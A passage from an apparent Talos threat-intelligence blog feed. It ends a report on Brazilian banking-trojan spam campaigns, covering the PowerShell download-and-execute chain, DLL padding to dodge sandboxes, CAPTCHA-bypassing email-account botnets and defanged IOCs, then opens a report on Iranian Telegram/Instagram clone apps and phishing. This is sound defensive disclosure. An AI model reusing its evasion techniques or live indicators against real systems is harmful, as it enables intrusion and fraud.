executes it in a remote process (library injection). This injected code is the final payload described later in this post.<br /><h2 id="h.az9x8x4ab5sz">&nbsp;</h2><h2 id="h.az9x8x4ab5sz">Campaign 2</h2><br />In addition to the infection process described in Campaign 1, Talos also observed a second series of campaigns that leveraged a different process to deliver and execute malware on victim systems. This campaign also appeared to target Portuguese-speaking victims.<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-GPjkFzAIGVk/W-Ga6ezRYaI/AAAAAAAAAjA/tz8cHeB9p2MLCdYTBFHgORkR_MjahbDfQCLcBGAs/s1600/image3.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="781" data-original-width="1201" height="416" src="https://1.bp.blogspot.com/-GPjkFzAIGVk/W-Ga6ezRYaI/AAAAAAAAAjA/tz8cHeB9p2MLCdYTBFHgORkR_MjahbDfQCLcBGAs/s640/image3.png" width="640" /></a></div><br />In this series of campaigns, attackers leveraged malicious PE32 executables to perform the initial stage of the infection process rather than Windows shortcut files (LNK). These PE32 executables were delivered in ZIP archives using the following naming convention:<br /><br />"Fatura-XXXXXXXXXX.zip," where "XXXXXXXXXX'" is a 10-digit numeric value.<br /><br />A PE32 executable is inside of the ZIP archive. These executables used the following naming convention:<br /><br />"__Fatura pendente - XXXX.exe," where "XXXX" is a four-digit alphanumeric value.<br /><br />When executed, these PE32 files are used to create a batch file in a subdirectory of %TEMP%.<br /><br />The Windows Command Processor is then used to execute the batch file which, in turn, executes PowerShell with the instructions to download the contents hosted on the attacker-controlled server and pass it to the Invoke-Expression (IEX) using the following syntax:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/--C_yq0gmakM/W-GbA73bx7I/AAAAAAAAAjE/KQ6Xkm6TnKwjmcWLQd92uF_liNqUHYNbgCLcBGAs/s1600/image15.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="100" data-original-width="1600" height="38" src="https://1.bp.blogspot.com/--C_yq0gmakM/W-GbA73bx7I/AAAAAAAAAjE/KQ6Xkm6TnKwjmcWLQd92uF_liNqUHYNbgCLcBGAs/s640/image15.png" width="640" /></a></div><br />The batch file is then deleted and the infection process continues.<br /><br />When the system reaches out to Bitly, the link shortener, to access the contents hosted at the shortened link destination, an HTTP redirection redirects the client to the attacker-controlled server hosting a PowerShell script that is passed into IEX and executed as previously described. The server delivers the following PowerShell:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-w4-BHHUXvr8/W-GbIIRZuCI/AAAAAAAAAjI/AgzAV2NKUlYTrE4ZO9LRFITpWBGOwlYPACLcBGAs/s1600/image14.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="556" data-original-width="1600" height="222" src="https://3.bp.blogspot.com/-w4-BHHUXvr8/W-GbIIRZuCI/AAAAAAAAAjI/AgzAV2NKUlYTrE4ZO9LRFITpWBGOwlYPACLcBGAs/s640/image14.png" width="640" /></a></div><br />This PowerShell script retrieves and executesthe malicious payload that is being delivered to the system. This PowerShell also leverages the Bitly service, as seen in the previous screenshot.<br /><br />With Bitly links, users can obtain some further information by adding the "+" sign to the end of the shortened URL. By doing this, we discovered that the link was created on Oct. 21, most likely around the campaign start time, and the number of clicks that have been registered through the Bitly service, we identified 699 clicks so far.<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-2xDyej0Nb3c/W-GbOU9BALI/AAAAAAAAAjM/VPpplydNVFU_2BhrYRLlWo9TDz8NRnYagCLcBGAs/s1600/image12.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="586" data-original-width="1600" height="234" src="https://4.bp.blogspot.com/-2xDyej0Nb3c/W-GbOU9BALI/AAAAAAAAAjM/VPpplydNVFU_2BhrYRLlWo9TDz8NRnYagCLcBGAs/s640/image12.png" width="640" /></a></div><br />While the HTTP request is made for a JPEG and the content type specified is "image/jpeg," the server actually delivers a ZIP archive containing a Windows DLL file called "b.dll."<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-1qNQOMNlTwQ/W-GbhB4t3qI/AAAAAAAAAjk/cGfOE1Vr6wEPEj3I6YVsmDqX8yW_75iEgCLcBGAs/s1600/image10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="701" data-original-width="1600" height="280" src="https://3.bp.blogspot.com/-1qNQOMNlTwQ/W-GbhB4t3qI/AAAAAAAAAjk/cGfOE1Vr6wEPEj3I6YVsmDqX8yW_75iEgCLcBGAs/s640/image10.png" width="640" /></a></div><div class="separator" style="clear: both; text-align: center;"></div><br />The script then executes sleep mode for 10 seconds after which it extracts the archive and saves the DLL to a subdirectory of %APPDATA% on the system. RunDLL32 is then used to execute the malware, infecting the system. The uncompressed DLL is very large, approximately 366MB in size, due to the inclusion of a large number of 0x00 within the binary. This may have been used to evade automated detection and analysis systems, as many will not properly process large files. Similarly, this will avoid sandbox detonation, as most sandboxes will not allow files of this size.<br /><br />Additionally, infected systems beacon to an attacker-controlled server (srv99[.]tk) during the infection process.<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-qjpA_EI7us4/W-Gbm3ZZI9I/AAAAAAAAAjs/DtWxVp_7byIwtboTQLBbgRuHZMNg5ZQYQCLcBGAs/s1600/image6.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="578" data-original-width="1370" height="270" src="https://3.bp.blogspot.com/-qjpA_EI7us4/W-Gbm3ZZI9I/AAAAAAAAAjs/DtWxVp_7byIwtboTQLBbgRuHZMNg5ZQYQCLcBGAs/s640/image6.png" width="640" /></a></div><br />Analysis of the DNS communications associated with this domain shows an increase in attempts to resolve this domain, which corresponds with the campaigns that have been observed.<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://2.bp.blogspot.com/-cCxhbXCA2dE/W-GbquI2qpI/AAAAAAAAAjw/RfV22GsWDFQMs0N38ve20qu1obxBy5NDQCLcBGAs/s1600/image7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="227" data-original-width="1329" height="108" src="https://2.bp.blogspot.com/-cCxhbXCA2dE/W-GbquI2qpI/AAAAAAAAAjw/RfV22GsWDFQMs0N38ve20qu1obxBy5NDQCLcBGAs/s640/image7.png" width="640" /></a></div><br />The majority of these resolution requests have occurred from systems located in Brazil.<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-PW4W6cY6Pcw/W-GbuE9Mo3I/AAAAAAAAAj4/-DNyCHb9NPQuVcawUos1DgP1eKo944W6ACLcBGAs/s1600/image2.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="508" data-original-width="1306" height="248" src="https://1.bp.blogspot.com/-PW4W6cY6Pcw/W-GbuE9Mo3I/AAAAAAAAAj4/-DNyCHb9NPQuVcawUos1DgP1eKo944W6ACLcBGAs/s640/image2.png" width="640" /></a></div><br />The PowerShell execution also facilitates communications with a dynamic DNS service. Similarly to the first Bitly link, we were able to obtain additional information in relation to this domain:<br /><div class="separator" style="clear: both; text-align: center;"></div><br /><div class="separator" style="clear: both; text-align: center;"><a href="https://1.bp.blogspot.com/-OSvUu-FwVi0/W-Gb0-7yNaI/AAAAAAAAAkA/nb77ln08HqUujgpIBeK3TQaBPseZR9OBQCLcBGAs/s1600/image9.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="566" data-original-width="1600" height="226" src="https://1.bp.blogspot.com/-OSvUu-FwVi0/W-Gb0-7yNaI/AAAAAAAAAkA/nb77ln08HqUujgpIBeK3TQaBPseZR9OBQCLcBGAs/s640/image9.png" width="640" /></a></div><br />We once again see a creation time, but this time, it's a few days later. This potentially shows the actor pivoting to a different email list to send the same spam information to.<br /><br /><h2 id="h.99dbqpunjs2u">Spam tools</h2><br />Both of these campaigns eventually deliver a banking trojan. However, Talos identified additional tools and malware hosted on the Amazon S3 Bucket. This malware is a remote administration tool with the capability to create emails. The emails are created on the <a href="https://en.wikipedia.org/wiki/Brasil_Online">BOL Online</a> email platform, an internet portal that provides email hosting and free email services in Brazil. The attacker's main goal appears to be creating a botnet of systems dedicated to email creation.<br /><br />The malware is developed in C# and contains many Portuguese words.<br /><br />Here is the function used to create a BOL email:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-o49KzA96VN0/W-GcBSvzi-I/AAAAAAAAAkM/Hrv1OKMGaUQ8brsxUiEJ529fnH9WKyGHACLcBGAs/s1600/image1.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="866" data-original-width="1600" height="346" src="https://4.bp.blogspot.com/-o49KzA96VN0/W-GcBSvzi-I/AAAAAAAAAkM/Hrv1OKMGaUQ8brsxUiEJ529fnH9WKyGHACLcBGAs/s640/image1.png" width="640" /></a></div><br />Once created, the randomly generated username and password are sent to a C2 server. BOL Online uses a CAPTCHA system to keep machines from creating emails. To bypass this protection, the malware author uses the Recaptcha API with the token provided from the C2 server:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-FoAW-T9H-C0/W-GcNhXtOgI/AAAAAAAAAkU/eV_yVBe3nYgal8VzCW6RgbtcOlMPdOhcwCLcBGAs/s1600/image4.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="544" data-original-width="1055" height="330" src="https://3.bp.blogspot.com/-FoAW-T9H-C0/W-GcNhXtOgI/AAAAAAAAAkU/eV_yVBe3nYgal8VzCW6RgbtcOlMPdOhcwCLcBGAs/s640/image4.png" width="640" /></a></div><br />During our investigation, all the created emails were prefixed by "financeir."<br /><br />The trojan has the capability to clean itself, send created email credentials and restart, download and execute binaries provided by the C2 server.<br /><br />Talos identified three C2 servers:<br /><br /><ul><li>hxxp://criadoruol[.]site/</li><li>hxxp://jdm-tuning[.]ru/</li><li>hxxp://www[.]500csgo[.]ru/</li></ul><br /><br />We identified more than 700 compromised systems on the servers that are members of his botnet. The oldest machine was compromised on Oct. 23. This botnet created more than 4,000 unique emails on the BOL Online service using the the aforementioned technique. Some of these emails were used to initiate the spam campaigns we tracked as part of this research.<br /><br />Given the filename patterns, the victimology along with the specific targeting aspect of both campaigns, Talos assesses with moderate confidence that both of these campaigns leveraged the same email generation tool we discovered on the actors open S3 Bucket. This shows a link between both campaigns to the same actor using the same toolset. Likely the actor attempted to use different delivery methods and email lists to deliver his malspam.<br /><br /><h2 id="h.bhnwmh4yso97">Final payload</h2><br />We identified two different payloads deployed during these campaigns. The payloads are developed in Delphi and are banking trojans targeting Brazilian banks.<br /><br />Fellow security firm FireEye already covered the first payload <a href="https://www.fireeye.com/blog/threat-research/2018/04/metamorfo-campaign-targeting-brazilian-users.html">here</a>. It gets information on the compromised system and exfiltrates the data to a C2 server. It also includes a keylogger, which is exactly the same as the keylogger we described in this post. When the user is logged into their bank's website, the malware can interact with them by showing a fake popup alleging to be from the bank. Here is an example that attempts to steal the user's CVV:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://4.bp.blogspot.com/-i6Wxx8IoVu0/W-GcS2CRmwI/AAAAAAAAAkc/lZ8pHnyKzBck4XV6jgbpIcXdee-lInv9gCLcBGAs/s1600/image5.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="647" data-original-width="665" height="620" src="https://4.bp.blogspot.com/-i6Wxx8IoVu0/W-GcS2CRmwI/AAAAAAAAAkc/lZ8pHnyKzBck4XV6jgbpIcXdee-lInv9gCLcBGAs/s640/image5.png" width="640" /></a></div><br />The second one has exactly the same features but is implemented differently. It mainly targets two=factor authentication by displaying fake popups to the user:<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-9cMraGaXg1I/W-GcXU9Vz5I/AAAAAAAAAkg/PWCGA63XP3w-HOSPTRavt041GiRGRakpwCLcBGAs/s1600/image11.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" data-original-height="431" data-original-width="646" height="426" src="https://3.bp.blogspot.com/-9cMraGaXg1I/W-GcXU9Vz5I/AAAAAAAAAkg/PWCGA63XP3w-HOSPTRavt041GiRGRakpwCLcBGAs/s640/image11.png" width="640" /></a></div><br />A keylogger then retrieves the information entered by the target.<br /><br />The following financial services organizations are being targeted by this malware: Santander, Itaù, Banco do Brasil, Caixa, Sicredi, Bradesco, Safra, Sicoob, Banco da Amazonia, Banco do Nordeste, Banestes, Banrisul, Banco de Brasilia and Citi.<br /><br /><h2 id="h.vl84nga5yg5r">Conclusion</h2><br />This strain of malware is prevalent throughout the world and is further proof that banking trojans remain popular. With this sample the attacker targets specific Brazilian banking institutions. This could suggest the attacker is from South America, where they could find it easier to use the obtained details and credentials to carry out illicit financial activities. We will continue to monitor financial crimeware activities throughout the threat landscape. This is not a sophisticated trojan, and most banking malware rarely is, but it's the latest example of how easy it can be for criminals steal from users by abusing spam to send their malicious payloads.This threat also shows the lengths that actors are going to in order to obtain additional emails to abuse, creating an automatic generation mechanism to get new emails for additional spam campaigns.<br /><br /><h2 id="h.6i86xkbp2smh">Coverage</h2><br />Additional ways our customers can detect and block this threat are listed below.<br /><div class="separator" style="clear: both; text-align: center;"><a href="https://3.bp.blogspot.com/-MTF4wljGuE0/W-GccKJ7PmI/AAAAAAAAAkk/Wo2E3cJ5bDEnfu53_rl4vrNzyiNFiMsRgCLcBGAs/s1600/image8.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><img border="0" data-original-height="268" data-original-width="320" src="https://3.bp.blogspot.com/-MTF4wljGuE0/W-GccKJ7PmI/AAAAAAAAAkk/Wo2E3cJ5bDEnfu53_rl4vrNzyiNFiMsRgCLcBGAs/s1600/image8.png" /></a></div><br />Advanced Malware Protection (<a href="https://www.cisco.com/c/en/us/products/security/advanced-malware-protection">AMP</a>) is ideally suited to prevent the execution of the malware used by these threat actors.<br /><br />Cisco Cloud Web Security (<a href="https://www.cisco.com/c/en/us/products/security/cloud-web-security/index.html">CWS</a>) or<a href="https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html"> </a><a href="https://www.cisco.com/c/en/us/products/security/web-security-appliance/index.html">Web Security Appliance (WSA</a>) web scanning prevents access to malicious websites and detects malware used in these attacks.<br /><br /><a href="https://www.cisco.com/c/en/us/products/security/email-security-appliance/index.html">Email Security</a> can block malicious emails sent by threat actors as part of their campaign.<br /><br />Network Security appliances such as<a href="https://www.cisco.com/c/en/us/products/security/firewalls/index.html"> </a><a href="https://www.cisco.com/c/en/us/products/security/firewalls/index.html">Next-Generation Firewall (NGFW</a>),<a href="https://www.cisco.com/c/en/us/products/security/intrusion-prevention-system-ips/index.html"> Next-Generation Intrusion Prevention System (NGIPS</a>), and<a href="https://meraki.cisco.com/products/appliances"> Meraki MX</a> can detect malicious activity associated with this threat.<br /><br /><a href="https://www.cisco.com/c/en/us/solutions/enterprise-networks/amp-threat-grid/index.html">AMP Threat Grid</a> helps identify malicious binaries and build protection into all Cisco Security products.<br /><br /><a href="https://umbrella.cisco.com/">Umbrella</a>, our secure internet gateway (SIG), blocks users from connecting to malicious domains, IPs, and URLs, whether users are on or off the corporate network.<br /><br />Open Source SNORTⓇ Subscriber Rule Set customers can stay up to date by downloading the latest rule pack available for purchase on <a href="https://www.snort.org/products">Snort.org</a>.<br /><br /><h2 id="h.57ejqrrdgqmm">Indicators of Compromise (IOCs)</h2><br />The following IOCs are associated with various malware distribution campaigns that were observed during the analysis of associated malicious activity.<br /><br /><h3 id="h.pztzu8hd25fe">Campaign #1</h3><br /><h4 id="h.nfjnyrq5q3dg">Stage 1 Downloaders (LNK Shortcuts):</h4><br />627a24cb61ace84a51dd752e181629ffa6faf8ce5cb152696bd65a1842cf58fd<br /><br /><h4 id="h.1hu14o6t0t6l">Stage 1 Downloaders Filenames (LNK Shortcuts):</h4><br />_Fatura pendente - HCBF.lnk<br /><br /><h4 id="h.28d0c6ry3opn">Stage 2 URLs</h4><br />hxxps://marcondesduartesousa2018[.]000webhostapp[.]com/downs/imagemFr.bmp<br />hxxps://s3-eu-west-1[.]amazonaws[.]com/killino2/image2.png<br /><br /><h4 id="h.vk3vlv6falc9">Stage 2 Powershell</h4><br />01fd7fdb435d60544d95f420f7813e6a30b6fa64bf4f1522053144a02f961e39<br /><br /><h4 id="h.7yf10s1qmcct">Stage 3 Archive</h4><br />a01287a79e76cb6f3a9296ecf8c147c05960de44fe8b54a5800d538e5c745f84<br /><br /><h4 id="h.6en2pb7sl2zt">Stage 3 Loader</h4><br />1ed49bd3e9df63aadcb573e37dfcbafffbb04acb2e4101b68d02ecda9da1eee7<br /><br /><h4 id="h.wdzq6ob5tqaw">Stage 3 Compressed Payload</h4><br />3ff7d275471bb29199142f8f764674030862bc8353c2a713333d801be6de6482<br /><br /><h4 id="h.7fmauqcao4q2">Stage 4 Final Payload</h4><br />61df7e7aad94942cb0bb3582aed132660caf34a3a4b970d69359e83e601cbcdb<br /><br /><h3 id="h.p7jw3mfvc6c4">Campaign #2</h3><br /><h4 id="h.a7zu133q371u">Stage 1 PE32 Executables:</h4><br />3b237b8a76dce85e63c006db94587f979af01fbda753ae88c13af5c63c625a12<br />46d77483071c145819b5a8ee206df89493fbe8de7847f2869b085b5a3cb04d2c<br />bce660e64ebdf5d4095cee631d0e5eafbdf052505bc5ff546c6fbbb627dbff51<br />7b241c6c12e4944a53c84814598695acc788dfd059d423801ff23d1a9ed7bbd2<br />91781126feeae4d1a783f3103dd5ed0f8fc4f2f8e6f51125d1bfc06683b01c39<br /><br /><h4 id="h.u5d68z69hdm3">Stage 1 PE32 Filenames:</h4><br />_Fatura pendente - QD95.exe<br />_Fatura pendente - QW2I.exe<br />_Fatura pendente - 9X3H.exe<br /><br /><h4 id="h.s7v5ovglhwtp">Stage 1 Archive Filenames:</h4><br />Fatura-2308132084.zip<br /><br /><h4 id="h.xrpqe3c0g6ns">Stage 1 URLs:</h4><br />hxxp://pgs99[.]online:80/script.txt<br />hxxp://pgs99[.]online:80/bb.jpg<br /><br /><h4 id="h.dixx7d1eago">Stage 1 Domains:</h4><br />pgs99[.]online<br /><br /><h4 id="h.6ltu3atsjq1n">Stage 2 URLs:</h4><br />hxxp://srv99[.]tk:80/conta/?89dhu2u09uh4hhy4rr8<br />hxxp://srv99[.]tk:80/favicon.ico<br /><br /><h4 id="h.jn824nqq15dq">Link Shorteners:</h4><br />hxxps://bit[.]ly/2CTUB9H#<br />hxxps://bit[.]ly/2SdhUQl?8438h84hy389<br /><br /><h4 id="h.xayyg4d2eelk">C2 Domains:</h4><br />hxxp://mydhtv[.]ddns[.]net:80/<br /><br /><h3 id="h.5dw2hzkwq93x">Spam tools</h3><br /><h4 id="h.mf0b6t1r9dbp">PE Sample:</h4><br />2a1af665f4692b8ce5330e7b0271cfd3514b468a92d60d032095aebebc9b34c5<br /><br /><h4 id="h.imhd8dmx2839">C2 Servers:</h4><br />hxxp://criadoruol[.]site/<br />hxxp://jdm-tuning[.]ru/<br />hxxp://www[.]500csgo[.]ru/<br /><br /><h3 id="h.y4605ejxmjfz">Final Payload</h3><br /><h4 id="h.xpzqcu6kkc2x">PE Samples:</h4><br />61df7e7aad94942cb0bb3582aed132660caf34a3a4b970d69359e83e601cbcdb<br />4b49474baaed52ad2a4ae0f2f1336c843eadb22609eda69b5f20537226cf3565<br /><br /></div><img src="http://feeds.feedburner.com/~r/feedburner/Talos/~4/IryTCv_UMlU" height="1" width="1" alt=""/>2018-11-08T12:09:12.538-05:000https://blog.talosintelligence.com/2018/11/metamorfo-brazilian-campaigns.htmlPersian Stalker pillages Iranian users of Instagram and Telegramhttp://feedproxy.google.com/~r/feedburner/Talos/~3/e-ugmy2EZ_k/persian-stalker.htmlAndroidBGPciscoinstagramMalwaremobileTalostelegramnoreply@blogger.com (Vitor Ventura)Mon, 05 Nov 2018 08:55:00 PSTtag:blogger.com,1999:blog-1029833275466591797.post-1247949900598653064<div dir="ltr" style="text-align: left;" trbidi="on"><div dir="ltr" style="text-align: left;" trbidi="on"><i>This blog post is authored by <a href="https://twitter.com/dadamitis">Danny Adamatis</a>, <a href="https://twitter.com/SecurityBeard">Warren Mercer</a>, <a href="https://twitter.com/r00tbsd">Paul Rascagneres</a>, <a href="https://twitter.com/_vventura">Vitor Ventura</a> and with the contributions of <a href="https://twitter.com/E191145">Eric Kuhla</a>.</i><br /><h2 id="h.ci5sku2rgucv">Introduction</h2><div style="text-align: left;">State-sponsored actors have a number of different techniques at their disposal to remotely gain access to social media and secure messaging applications. Starting in 2017 and continuing through 2018, Cisco Talos has seen different techniques being used to attack users and steal their private information. These techniques used fake login pages, malicious apps disguised as their legitimate counterparts and BGP hijacking, and were specifically targeting Iranian users of the secure messaging app Telegram and the social media site Instagram.</div></div><div style="text-align: left;"><br /></div><div style="text-align: left;">Telegram has become a popular target for greyware in Iran, as the app is used by an estimated <a href="http://aftabnews.ir/fa/news/502050">40 million users</a>. While it's mostly used for daily communication, protest organizers also used it in the past to organize demonstrations against the Iranian government, specifically in December 2017. In a few instances, the Iranian government asked Telegram to <a href="http://www.telegraph.co.uk/news/2017/12/30/iranian-students-clash-police-tehran-protests-enter-third-day/">shut down certain channels for "promoting violence."</a> The tactics outlined in this post have been in use since 2017 in an effort to gather information about Telegram and Instagram users. The campaigns vary in complexity, resource needs and methods. Below, we outline examples of a network attack, application clones and classic phishing. It is our belief that these campaigns were used to specifically target Iranian users of the Telegram app in an effort to steal personal and login information.</div><a name='more'></a><div style="text-align: left;">Once installed, some of these Telegram "clones" have access to mobile devices' full contact lists and messages, even if the users are also using the legitimate Telegram app. In the case of phony Instagram apps, the malicious software sends full session data back to backend servers, which allows the attacker to take full control of the account in use. We declare with high confidence that these apps should be classified as "greyware." It is not malicious enough to be classified as malware, but is suspicious enough to be considered a potentially unwanted program (PUP). This kind of software is difficult to detect, as it typically fulfills its functions that are expected by the user (ex. send messages). The only time this kind of software is detected by security researchers is if it has an impact somewhere else. Talos eventually discovered several pieces of software that have the potential to be used in far-reaching campaigns. We believe this greyware has the potential to reduce the privacy and security of mobile users who use these apps. Our research revealed that some of these applications send data back to a host server, or are controlled in some way from IP addresses located in Iran, even if the devices are located outside the country.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">Another method we saw in the Iranian attacks was the creation of fake login pages. Even though this isn't an advanced technique, it is effective against users who aren't as aware of cybersecurity as they should be. Iran-connected groups like "Charming Kitten" have been using this technique for a while targeting secure messaging apps. Some actors are also hijacking the device's BGP protocol. This technique redirects the traffic of all routers, without the device considering the original of those new routes. In order to hijack BGP, there needs to be some sort of cooperation from an internet service provider (ISP), and is easily detectable, so the new routes won't be in place for very long.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">Talos hasn't found a solid connection between the several attacks we've observed, but all of them target Iran and their nationals and the Telegram app. Although this post focuses on Iran, mobile users across the globe still need to be aware that these techniques could be used by any threat actor in any country, state-sponsored or not. This is especially prevalent in countries like Iran and Russia, where apps like Telegram are banned, and developers create clones that appear on official and unofficial app stores to replicate Telegram's services.</div><div style="text-align: left;"><br /></div><div style="text-align: left;">A regular user can't do anything about the BGP hijacking, but using legitimate applications from the official application stores reduces the risk. This same rule applies to the cloned applications, installing applications from untrusted sources implies a certain degree of risk that the users must be aware of. In both situations, this risk is substantially increased when the applications are unofficial "enhanced functionality" applications, even when they are available on the official Google Play store.</div><h2 id="h.qtw3bcepjoo3"><span style="font-size: large;">Tactics</span></h2><h3 id="h.4wez80pslkob">Functionality enhancement applications (grey)</h3><h4 id="h.bj3riohrija2">Andromedaa.ir and Cambridge Universal Academy</h4><b>Description of andromedaa.ir</b><br /><br />Talos identified a software developer completely focused on the Iranian market. The publisher goes by the name "andromedaa.ir" on both iOS and Android platforms. It develops software intended to increase users' exposure on social media networks, like Instagram, as well as the number of Iranian users on certain Telegram channels.<br /><div style="text-align: left;"><br /></div><div style="text-align: left;">While looking at the website, and more specifically the installation links, it is clear that none of these applications are published in the official application stores (Google or Apple), which is likely due to sanctions put in place against Iran by the U.S. government.<br /><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-Rp4s-lAqXfc/W-BazaFOQDI/AAAAAAAAAP4/EXULRDr8SNABWj9FCWqWMAZeVNjKhmwGwCK4BGAYYCw/s1600/image16.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="347" src="https://2.bp.blogspot.com/-Rp4s-lAqXfc/W-BazaFOQDI/AAAAAAAAAP4/EXULRDr8SNABWj9FCWqWMAZeVNjKhmwGwCK4BGAYYCw/s640/image16.png" width="640" /></a></div><div style="text-align: center;">Whois information for andromedaa.ir</div><br /><div style="text-align: left;">The andromedaa.ir domain is registered with the <span style="font-family: &quot;courier new&quot; , &quot;courier&quot; , monospace;">h0mayun@outlook.com</span> email address. This is the same email address used to registered other domains for the cloned Instagram and Telegram applications (see other sections below).</div><div style="text-align: left;"><br /></div><div style="text-align: left;">Talos identified various domains after analysing the whois information associated with the domain andromedaa[.]com, all but one registered with the same phone number.</div><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-qSmYUBcM-bo/W-BwpK4IIAI/AAAAAAAAAVY/GEX5CsyODGQcPCE6J2J1PaOrCJh06rf6ACK4BGAYYCw/s1600/Screenshot%2B2018-11-05%2Bat%2B16.32.20.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="520" src="https://3.bp.blogspot.com/-qSmYUBcM-bo/W-BwpK4IIAI/AAAAAAAAAVY/GEX5CsyODGQcPCE6J2J1PaOrCJh06rf6ACK4BGAYYCw/s640/Screenshot%2B2018-11-05%2Bat%2B16.32.20.png" width="640" /></a></div><div style="text-align: center;">A partial list of the domains found</div><br />We scanned the IP address associated with the aforementioned domains, which revealed a pattern in their use of SSL certificates.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://4.bp.blogspot.com/-3ByVph3s5D8/W-BbWRBcPAI/AAAAAAAAAQE/Zdy-2n1eyl8_cA_wfm14RDpiqx-GszcsQCK4BGAYYCw/s1600/image10.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="380" src="https://4.bp.blogspot.com/-3ByVph3s5D8/W-BbWRBcPAI/AAAAAAAAAQE/Zdy-2n1eyl8_cA_wfm14RDpiqx-GszcsQCK4BGAYYCw/s640/image10.png" width="640" /></a></div><div style="text-align: center;">Certificate information</div><br /><div style="text-align: left;">This SSL certificate analysis revealed an additional domain — flbgr[.]com — whose whois information was privacy protected. Based off the low prevalence of those values in the SSL certificate, Talos associates this domain to the same threat actor with high confidence. The domain flbgr[.]com was registered on Aug. 6, 2018, making it the most recently registered domain, and resolved to the IP address 145.239.65[.]25. Cisco Farsight data showed other domains also resolve to that same IP address.<br /><br /></div><div class="separator" style="clear: both; text-align: center;"><a href="http://2.bp.blogspot.com/-qMdOFPkmdIg/W-BbfvbhjPI/AAAAAAAAAQM/CrpdR21QzOQkYIa4wzwhVORJEp_Kx01ZQCK4BGAYYCw/s1600/image7.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="230" src="https://2.bp.blogspot.com/-qMdOFPkmdIg/W-BbfvbhjPI/AAAAAAAAAQM/CrpdR21QzOQkYIa4wzwhVORJEp_Kx01ZQCK4BGAYYCw/s640/image7.png" width="640" /></a></div><div style="text-align: center;">List of domains associated with the same IP address</div><br />Talos then discovered an SSL certificate with a common name of followerbegir[.]ir that had a sha256 fingerprint. We also found another certificate that was very similar in nature. However, there appeared to be two typos: one in the common name field "followbeg.ir," and another in the organization field where it's identified as "andromeda," instead of andromedaa.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-AQwQFLL-HAg/W-BboFa4xvI/AAAAAAAAAQY/-YneMrwEQJw8TjNa_Tt2ZibLxefXrHCVACK4BGAYYCw/s1600/image22.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="528" src="https://3.bp.blogspot.com/-AQwQFLL-HAg/W-BboFa4xvI/AAAAAAAAAQY/-YneMrwEQJw8TjNa_Tt2ZibLxefXrHCVACK4BGAYYCw/s640/image22.png" width="640" /></a></div><br /><div style="text-align: center;">Certificate information</div><br /><b>Description of&nbsp;</b><b>Cambridge Universal Academy</b><br /><br />Andromedaa.ir published the iOS application, but it's signed with a developer certificate issued to Cambridge Universal Academy Ltd. This is an England and Wales-registered company that offers iOS development services. This same company is owned by an Iranian citizen who owns at least four other companies in four different countries: England, U.S., Turkey and Estonia. All of those companies share the same services, offering a web page similar in content.<br /><br /><div class="separator" style="clear: both; text-align: center;"><a href="http://3.bp.blogspot.com/-uQewtAxHEWs/W-Bwbda7ZkI/AAAAAAAAAVQ/9ReGzcpDxrU-ux6-KU_1jMkJN5GbaGFQwCK4BGAYYCw/s1600/Screenshot%2B2018-11-05%2Bat%2B16.31.23.png" imageanchor="1" style="margin-left: 1em; margin-right: 1em;"><img border="0" height="114" src="https://3.bp.blogspot.com/-uQewtAxHEWs/W-Bwbda7ZkI/AAAAAAAAAVQ/9ReGzcpDxrU-ux6-KU_1jMkJN5GbaGFQwCK4BGAYYCw/s640/Screenshot%2B2018-11-05%2Bat%2B16.31.23.png" width="640" /></a></div><br /><br /><div style="text-align: left;"><span style="text-align: justify;">Google flagged the URL mohajer.co.uk for phishing, which might be related to the fact that this site, along with Mohajer.eu, are offering visa services for the U.K., U.S., Canada, Australia and other countries in the European Economic Area.</span></div><br /><b> Business model</b><br /><b><br /></b><br /><div style="text-align: left;">All of the andromedaa.ir applications are meant to increase users' exposure on Instagram or Telegram by increasing the likes, comments, followers or even the number 